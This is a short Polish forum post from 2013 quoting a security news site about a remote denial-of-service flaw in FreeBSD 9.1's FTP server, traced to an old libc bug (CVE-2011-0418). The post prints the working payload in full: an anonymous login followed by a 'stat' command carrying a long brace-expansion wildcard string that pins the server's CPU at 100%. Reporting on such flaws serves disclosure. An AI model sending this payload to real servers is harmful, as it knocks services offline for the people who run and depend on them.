01.02.2013, 20:33
Jak podaje serwis niebezpiecznik:
A tu można obejrzeć filmik obrazujący wykonanie tego ataku:
Źródło: niebezpiecznik.pl
Cytat: Maksymilian Arciemowicz opublikował szczegóły ataku zdalnej odmowy dostępu do usługi na serwery ftpd na FreeBSD 9.1 W skrócie, po wysłaniu odpowiedniego ciągu znaków do serwera FTP, serwer przestaje odpowiadać.
Jak tłumaczy Arciemowicz, atak bazuje na starej luce w libc (CVE-2011-0418). Wystarczy zalogować się do serwera jako anonymous i przesłać następujący ciąg znaków (wildcard), który sprawi, że proces zacznie zużywać 100% CPU:
Kod:
stat
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}{a,b}
A tu można obejrzeć filmik obrazujący wykonanie tego ataku:
[Aby zobaczyć linki, zarejestruj się tutaj]
Źródło: niebezpiecznik.pl